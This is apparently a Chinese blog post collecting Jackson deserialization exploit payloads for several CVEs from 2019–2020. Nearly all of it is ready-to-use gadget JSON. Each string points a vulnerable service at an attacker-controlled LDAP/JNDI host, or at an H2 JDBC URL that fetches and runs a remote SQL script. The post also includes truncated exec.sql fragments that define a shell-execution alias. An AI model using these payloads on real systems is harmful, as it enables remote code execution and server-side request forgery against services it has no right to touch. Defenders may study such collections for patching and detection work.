Jackson反序列化漏洞Payload收集
CVE-2019-12384
SSRF
1 | {"ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:tcp://IP/"}} |
RCE
poc
1 | {"ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://IP/exp.sql'"}} |
exec.sql
1 | CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws |
CVE-2020-8840
1 | {"org.apache.xbean.propertyeditor.JndiConverter", {"asText":"ldap://IP/e"}} |
CVE-2020-9548
1 | {"br.com.anteros.dbcp.AnterosDBCPConfig",{"metricRegistry":"ldap://IP/e"}} |
CVE-2020-24616
1 | {"br.com.anteros.dbcp.AnterosDBCPDataSource",{"metricRegistry":"ldap://IP/e"}} |
CVE-2020-35728
1 | {"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool",{"jndiPath":"ldap://IP/e"}} |
CVE-2020-36179
poc
1 | {"org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS","url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://IP/exec.sql'"} |
exec.sql
1 | CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { |
CVE-2020-36186
1 | ["org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource",{"dataSourceName":"ldap://IP/E"}] |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 狐狸小镇!